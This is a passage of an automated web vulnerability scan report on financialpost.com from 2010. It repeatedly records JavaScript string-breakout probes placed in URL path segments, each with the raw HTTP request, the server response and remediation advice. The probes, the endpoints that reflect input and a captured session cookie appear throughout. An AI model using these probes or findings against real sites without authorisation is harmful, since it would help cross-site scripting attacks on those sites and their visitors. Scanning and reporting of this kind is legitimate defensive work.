Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/email/6e698'%3b8b8919e8594 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43228
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8274'%3b195d5cfee53 was submitted in the REST URL parameter 1. This input was echoed as b8274';195d5cfee53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogsb8274'%3b195d5cfee53/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36261
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5338f'%3bc1451072755 was submitted in the REST URL parameter 1. This input was echoed as 5338f';c1451072755 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers5338f'%3bc1451072755/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36303
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60ebf'%3bee703a43543 was submitted in the REST URL parameter 1. This input was echoed as 60ebf';ee703a43543 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers60ebf'%3bee703a43543/Passionate+about+inclusion/3908742/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 81033
Expires: Sun, 19 Dec 2010 03:15:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers60ebf';ee703a43543/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers60ebf';ee703a43543;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=31781956?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17bc9'%3b34da138a151 was submitted in the REST URL parameter 3. This input was echoed as 17bc9';34da138a151 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Passionate+about+inclusion/390874217bc9'%3b34da138a151/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70051
Expires: Sun, 19 Dec 2010 03:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/passionate-about-inclusion/390874217bc9';34da138a151/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=passionate-about-inclusion;kw=390874217bc9';34da138a151;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39990
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29ff7'%3bb3f1c59f563 was submitted in the REST URL parameter 4. This input was echoed as 29ff7';b3f1c59f563 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Passionate+about+inclusion/3908742/29ff7'%3bb3f1c59f563 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37230
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5c25'%3b9ab1b8da1c9 was submitted in the REST URL parameter 1. This input was echoed as d5c25';9ab1b8da1c9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careersd5c25'%3b9ab1b8da1c9/Pink+collar+jobs+spare+women+from+recession/3951473/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74447
Expires: Sun, 19 Dec 2010 03:15:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careersd5c25';9ab1b8da1c9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careersd5c25';9ab1b8da1c9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70150980?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb7af'%3b3e6963f564a was submitted in the REST URL parameter 3. This input was echoed as bb7af';3e6963f564a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473bb7af'%3b3e6963f564a/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63862
Expires: Sun, 19 Dec 2010 03:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/pink-collar-jobs-spare-women-from-recession/3951473bb7af';3e6963f564a/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=pink-collar-jobs-spare-women-from-recession;kw=3951473bb7af';3e6963f564a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42d4'%3b113cc4c7a9f was submitted in the REST URL parameter 4. This input was echoed as d42d4';113cc4c7a9f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Pink+collar+jobs+spare+women+from+recession/3951473/d42d4'%3b113cc4c7a9f HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37780
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67407'%3b92dac48a721 was submitted in the REST URL parameter 1. This input was echoed as 67407';92dac48a721 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers67407'%3b92dac48a721/Rules+keep+work+parties+festive/3978714/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74402
Expires: Sun, 19 Dec 2010 03:15:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers67407';92dac48a721/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers67407';92dac48a721;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95963968?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f598'%3b1d4c31151fb was submitted in the REST URL parameter 3. This input was echoed as 5f598';1d4c31151fb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Rules+keep+work+parties+festive/39787145f598'%3b1d4c31151fb/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63421
Expires: Sun, 19 Dec 2010 03:15:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:48 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/rules-keep-work-parties-festive/39787145f598';1d4c31151fb/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=rules-keep-work-parties-festive;kw=39787145f598';1d4c31151fb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a25'%3b364cbeb8eca was submitted in the REST URL parameter 4. This input was echoed as 71a25';364cbeb8eca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Rules+keep+work+parties+festive/3978714/71a25'%3b364cbeb8eca HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44245
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19264'%3b66fe6c3fb0d was submitted in the REST URL parameter 1. This input was echoed as 19264';66fe6c3fb0d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers19264'%3b66fe6c3fb0d/Texting+lazy+IMHO/3941140/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78645
Expires: Sun, 19 Dec 2010 03:15:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers19264';66fe6c3fb0d/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers19264';66fe6c3fb0d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69933413?">
...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26269'%3b7e045e51a09 was submitted in the REST URL parameter 3. This input was echoed as 26269';7e045e51a09 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Texting+lazy+IMHO/394114026269'%3b7e045e51a09/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62901
Expires: Sun, 19 Dec 2010 03:15:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:19 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/careers/texting-lazy-imho/394114026269';7e045e51a09/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=careers;kw=texting-lazy-imho;kw=394114026269';7e045e51a09;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95168182?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b2fc'%3b095459ca46b was submitted in the REST URL parameter 4. This input was echoed as 1b2fc';095459ca46b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers/Texting+lazy+IMHO/3941140/1b2fc'%3b095459ca46b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:15:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44669
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1639b'%3b9b5d88f64ad was submitted in the REST URL parameter 1. This input was echoed as 1639b';9b5d88f64ad in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /careers1639b'%3b9b5d88f64ad/writing+workers+with+children/3943108/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73488
Expires: Sun, 19 Dec 2010 03:15:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:15:33 GMT
Connection: close
